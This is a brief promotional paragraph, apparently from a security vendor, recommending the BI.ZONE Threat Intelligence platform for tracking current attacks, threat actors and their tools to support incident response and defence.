To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.
